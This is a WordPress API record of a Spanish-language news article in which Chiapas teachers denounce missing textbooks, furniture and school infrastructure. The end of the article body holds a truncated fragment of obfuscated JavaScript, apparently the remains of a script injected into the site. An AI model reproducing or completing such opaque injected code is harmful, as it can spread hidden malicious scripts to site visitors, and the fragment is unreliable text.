{"id":17704,"date":"2024-09-07T03:10:03","date_gmt":"2024-09-07T03:10:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17704"},"modified":"2024-09-07T03:10:04","modified_gmt":"2024-09-07T03:10:04","slug":"escuelas-de-chiapas-con-grandes-carencias-en-infraestructura-e-inmobiliario","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17704","title":{"rendered":"Escuelas de Chiapas con grandes carencias en infraestructura e inmobiliario"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"623\" height=\"449\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725678435358.jpg\" alt=\"\" class=\"wp-image-17705\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725678435358.jpg 623w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725678435358-300x216.jpg 300w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>6 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; En el arranque del nuevo ciclo escolar, docentes de la Asamblea Estatal Democr\u00e1tica (AED) denunciaron una serie de carencias que enfrentan las escuelas de las zonas marginadas como la falta de infraestructura y mobiliario.<\/p>\n\n\n\n<p>En este escenario, Armando Falconi Borraz, secretario de la AED de la Secci\u00f3n 40 de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE) lament\u00f3 todas estas carencias que est\u00e1n padeciendo.<\/p>\n\n\n\n<p>\u201cUn tema que, es reprobable es que, para este nuevo ciclo escolar, los alumnos a\u00fan no hayan recibido los libros de texto gratuitos, es un derecho que les corresponde, pero las autoridades ni eso pueden cumplir\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Pero esto no es todo, ya que, existen otros factores como la inseguridad y la deserci\u00f3n escolar que afectan en gran medida al estudiantado chiapaneco.<\/p>\n\n\n\n<p>\u201cTenemos que decir que, el plan de la nueva escuela mexicana ha sido un fracaso en este sexenio. Al menos para los educandos de los tres grados de telesecundaria a\u00fan no han recibido los mismos, no puede ser que las autoridades no cumplan con este compromiso\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Consider\u00f3 que: \u201cLas autoridades federales y estatales se enfocaron m\u00e1s en las elecciones que en el de la educaci\u00f3n, y prueba de ello, dijo, es que las escuelas est\u00e1n abandonadas, marginadas y no ha habido infraestructura educativa, no hay libros, falta insumos\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Todo ello, a pesar de que, Chiapas sigue siendo el primer lugar en deserci\u00f3n escolar; esto es el reflejo del desinter\u00e9s que han mostrado las autoridades en la educaci\u00f3n, es una realidad que vive la entidad.<\/p>\n\n\n\n<p>Armando Falconi especific\u00f3 que en este sexenio la educaci\u00f3n se ha degradado, de tal manera, que existe un abandono total, insisto.<\/p>\n\n\n\n<p>\u201cDebemos ser enf\u00e1ticos, nos hace falta mobiliario, no tenemos, y tenemos que componer nuestras bancas porque no hay para los alumnos, eso es algo que no se debe tolerar, no puede existir tanto desinter\u00e9s con la educaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 6 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; En el arranque del nuevo ciclo escolar, docentes de la Asamblea Estatal Democr\u00e1tica (AED) denunciaron una serie de carencias que enfrentan las escuelas de las zonas marginadas como la falta de infraestructura y mobiliario. En este escenario, Armando Falconi Borraz, secretario de la AED de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17705,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17704","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17704","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17704"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17704\/revisions"}],"predecessor-version":[{"id":17706,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17704\/revisions\/17706"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17705"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}